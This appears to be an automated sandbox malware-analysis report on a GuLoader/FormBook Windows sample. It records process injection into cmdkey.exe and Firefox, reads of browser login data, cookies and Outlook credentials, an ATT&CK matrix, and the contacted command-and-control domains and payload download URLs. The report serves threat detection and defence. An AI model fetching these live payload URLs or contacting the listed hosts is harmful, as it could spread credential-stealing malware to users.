        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeNtSetInformationThread: Direct from: 0x773F2A6CJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: NULL target: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\cmdkey.exeThread register set: target process: 2136Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\cmdkey.exeThread APC queued: target process: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess created: C:\Users\user\Desktop\ImBm40hNZ2.exe "C:\Users\user\Desktop\ImBm40hNZ2.exe"Jump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: aypAdCUEzlG.exe, 00000004.00000000.17123246060.0000000001CC0000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000002.21524491333.0000000001CC1000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21525493268.0000000001871000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: aypAdCUEzlG.exe, 00000004.00000000.17123246060.0000000001CC0000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000002.21524491333.0000000001CC1000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21525493268.0000000001871000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: aypAdCUEzlG.exe, 00000004.00000000.17123246060.0000000001CC0000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000002.21524491333.0000000001CC1000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21525493268.0000000001871000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: aypAdCUEzlG.exe, 00000004.00000000.17123246060.0000000001CC0000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000002.21524491333.0000000001CC1000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21525493268.0000000001871000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00405BB3 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405BB3

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeDirectory queried: number of queries: 1001

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		312
        Process Injection        		1
        Masquerading        		1
        OS Credential Dumping        		121
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Abuse Elevation Control Mechanism        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		312
        Process Injection        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Abuse Elevation Control Mechanism        		LSA Secrets13
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
        Obfuscated Files or Information        		Cached Domain Credentials14
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529843 Sample: ImBm40hNZ2.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 32 www.518729.xyz 2->32 34 www.sedezne-blazine.shop 2->34 36 21 other IPs or domains 2->36 50 Suricata IDS alerts for network traffic 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Multi AV Scanner detection for submitted file 2->54 58 2 other signatures 2->58 10 ImBm40hNZ2.exe 1 33 2->10         started        signatures3 56 Performs DNS queries to domains with low reputation 32->56 process4 file5 30 C:\Users\user\AppData\Local\...\System.dll, PE32 10->30 dropped 70 Switches to a custom stack to bypass stack traces 10->70 14 ImBm40hNZ2.exe 12 10->14         started        signatures6 process7 dnsIp8 44 secretspark.com.bd 170.249.236.53, 443, 49738 PRIVATESYSTEMSUS United States 14->44 46 groupriam.com 199.103.62.205, 443, 49739 CIRRUSTECHLTDCA Canada 14->46 72 Maps a DLL or memory area into another process 14->72 18 aypAdCUEzlG.exe 14->18 injected signatures9 process10 signatures11 48 Found direct / indirect Syscall (likely to bypass EDR) 18->48 21 cmdkey.exe 13 18->21         started        process12 signatures13 60 Tries to steal Mail credentials (via file / registry access) 21->60 62 Tries to harvest and steal browser information (history, passwords, etc) 21->62 64 Modifies the context of a thread in another process (thread injection) 21->64 66 3 other signatures 21->66 24 aypAdCUEzlG.exe 21->24 injected 28 firefox.exe 21->28         started        process14 dnsIp15 38 www.bullbord.top 203.161.46.205, 49758, 49759, 49760 VNPT-AS-VNVNPTCorpVN Malaysia 24->38 40 www.home-check.shop 185.230.15.3, 49770, 49771, 49772 VIALIS-MOSELLELocatedinMetzFranceFR Germany 24->40 42 10 other IPs or domains 24->42 68 Found direct / indirect Syscall (likely to bypass EDR) 24->68 signatures16

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        ImBm40hNZ2.exe39%ReversingLabsWin32.Trojan.Guloader

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.itemfilterhub.shop
        		104.21.50.202
        		truetrue
          		unknown
          www.ayypromo.shop
          		176.57.64.102
          		truetrue
            		unknown
            www.hypepgbet.online
            		82.112.244.92
            		truetrue
              		unknown
              www.bullbord.top
              		203.161.46.205
              		truetrue
                		unknown
                www.meetfactory.biz
                		72.14.178.174
                		truetrue
                  		unknown
                  www.home-check.shop
                  		185.230.15.3
                  		truetrue
                    		unknown
                    www.magicface.shop
                    		13.248.169.48
                    		truetrue
                      		unknown
                      shops.myshopify.com
                      		23.227.38.74
                      		truetrue
                        		unknown
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truetrue
                          		unknown
                          7ddw.top
                          		154.23.184.207
                          		truetrue
                            		unknown
                            asa-malukuutara.com
                            		103.247.8.53
                            		truetrue
                              		unknown
                              www.cachsoicautdtc.best
                              		172.67.191.241
                              		truetrue
                                		unknown
                                groupriam.com
                                		199.103.62.205
                                		truefalse
                                  		unknown
                                  www.518729.xyz
                                  		23.231.158.3
                                  		truetrue
                                    		unknown
                                    www.foundation-repair.biz
                                    		199.59.243.227
                                    		truetrue
                                      		unknown
                                      secretspark.com.bd
                                      		170.249.236.53
                                      		truefalse
                                        		unknown
                                        www.cannulafactory.top
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.sedezne-blazine.shop
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.7ddw.top
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.emeluzunmoda.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.groupriam.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.asa-malukuutara.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.foundation-repair.biz/enra/true
                                                      		unknown
                                                      http://www.cachsoicautdtc.best/fp5q/?9B6h=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&FlS=3ldH5dkH-dBLftrue
                                                        		unknown
                                                        http://www.bullbord.top/veti/true
                                                          		unknown
                                                          http://www.meetfactory.biz/o0e7/true
                                                            		unknown
                                                            http://www.itemfilterhub.shop/p1v4/true
                                                              		unknown
                                                              http://www.7ddw.top/pcjw/true
                                                                		unknown
                                                                http://www.home-check.shop/ns8q/?9B6h=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s=&FlS=3ldH5dkH-dBLftrue
                                                                  		unknown
                                                                  http://www.emeluzunmoda.online/c0kl/?FlS=3ldH5dkH-dBLf&9B6h=AxZR1MxN1yP04/KkfJjqNmRSK4d8g2rgChYpgYbN8LwS/ds0321h0MeEKpKCay63h/JFzZR/nOfV69IulQUTnqrvqwrwGbRyvD357dhiEinhnUxdss5AyLg=true
                                                                    		unknown
                                                                    http://www.cannulafactory.top/y82c/?FlS=3ldH5dkH-dBLf&9B6h=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M=true
                                                                      		unknown
                                                                      http://www.asa-malukuutara.com/21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&FlS=3ldH5dkH-dBLftrue
                                                                        		unknown
                                                                        http://www.cannulafactory.top/y82c/true
                                                                          		unknown
                                                                          https://secretspark.com.bd/sCvgayhFHxN196.binfalse
                                                                            		unknown
                                                                            http://www.7ddw.top/pcjw/?9B6h=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&FlS=3ldH5dkH-dBLftrue
                                                                              		unknown
                                                                              http://www.foundation-repair.biz/enra/?FlS=3ldH5dkH-dBLf&9B6h=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=true
                                                                                		unknown
                                                                                http://www.emeluzunmoda.online/c0kl/true
                                                                                  		unknown
                                                                                  http://www.ayypromo.shop/mktg/?9B6h=0TalvP/u8kBxCEcVC8ZYLDfWzg1d8ZMLdJUcZNeUjcCfUnJGBGp8dbleblgtUVXijVAfatBw5nkrSCpMHneIWtcqoMWdglrJlT3qBoY6Uu70toyjn3om774=&FlS=3ldH5dkH-dBLftrue
                                                                                    		unknown
                                                                                    http://www.asa-malukuutara.com/21hf/true
                                                                                      		unknown
                                                                                      http://www.home-check.shop/ns8q/true
                                                                                        		unknown
                                                                                        http://www.bullbord.top/veti/?9B6h=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&FlS=3ldH5dkH-dBLftrue
                                                                                          		unknown
                                                                                          http://www.meetfactory.biz/o0e7/?9B6h=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&FlS=3ldH5dkH-dBLftrue
                                                                                            		unknown
                                                                                            http://www.foundation-repair.biz/enra/?9B6h=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=&FlS=3ldH5dkH-dBLftrue
                                                                                              		unknown
                                                                                              http://www.cachsoicautdtc.best/fp5q/true
                                                                                                		unknown
                                                                                                https://www.groupriam.com/sCvgayhFHxN196.binfalse
                                                                                                  		unknown
                                                                                                  http://www.ayypromo.shop/mktg/true
                                                                                                    		unknown

                                                                                                    URLs from Memory and Binaries

                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                    https://duckduckgo.com/chrome_newtabcmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drfalse
                                                                                                      		unknown
                                                                                                      https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchcmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drfalse
                                                                                                        		unknown
                                                                                                        https://duckduckgo.com/ac/?q=45-0FIUV.5.drfalse
                                                                                                          		unknown
                                                                                                          http://crl.comodoImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/header/headerBuilder.min.jsImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/libs/autocomplete.min.js?ver=7.6.0ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/wishlist.min.js?ver=7.6.ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://secretspark.com.bd/zI?ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003148000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://www.hypepgbet.online/b4j0/?9B6h=KngNaAOjL/iTBaPxCGh1gxfB4GNPew7mjLKUgaHVamCvjinOC9GX1YGQY2QJcmdkey.exe, 00000005.00000002.21526958095.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000004C12000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/woodmartCompare.min.js?vImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/helpers.min.js?ver=7ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.meetfactory.biz/o0e7?gp=1&js=1&uuid=1728474078.0025735182&other_args=eyJ1cmkiOiAiL28wZTcicmdkey.exe, 00000005.00000002.21528212418.0000000006650000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526958095.000000000474A000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/cartWidget.min.js?ver=7.ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/loginSidebar.min.js?ver=ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://secretspark.com.bd/wp-json/ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://www.groupriam.com/sCvgayhFHxN196.bintEZImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://www.google.comcmdkey.exe, 00000005.00000002.21526958095.0000000004294000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526958095.00000000053DA000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000003484000.00000004.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.00000000045CA000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.17498389516.000000000DAA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://cannulafactory.top/y82c?FlS=3ldH5dkH-dBLf&9B6h=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPcmdkey.exe, 00000005.00000002.21526958095.0000000004F24000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000004114000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://www.groupriam.com/sCvgayhFHxN196.binwsImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/hiddenSidebar.min.jsImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://www.groupriam.com/sCvgayhFHxN196.binsImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drfalse
                                                                                                                                                		unknown
                                                                                                                                                https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/simpleDropdown.min.js?ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/menuOffsets.min.js?verImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/mobileNavigation.min.jImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csscmdkey.exe, 00000005.00000002.21526958095.0000000004D92000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000003F82000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/stickySidebarBtn.min.js?ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://ocsp.quovadisoffshore.com0ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://secretspark.com.bd/sCvgayhFHxN196.binhttps://www.groupriam.com/sCvgayhFHxN196.binMasssCliproImBm40hNZ2.exe, 00000003.00000002.17213820161.0000000004CC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://www.groupriam.com/ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://www.groupriam.com/oNImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www70.meetfactory.biz/aypAdCUEzlG.exe, 00000006.00000002.21526023885.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icocmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://tilda.cccmdkey.exe, 00000005.00000002.21526958095.00000000056FE000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.00000000048EE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/onRemoveFromCart.min.js?ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
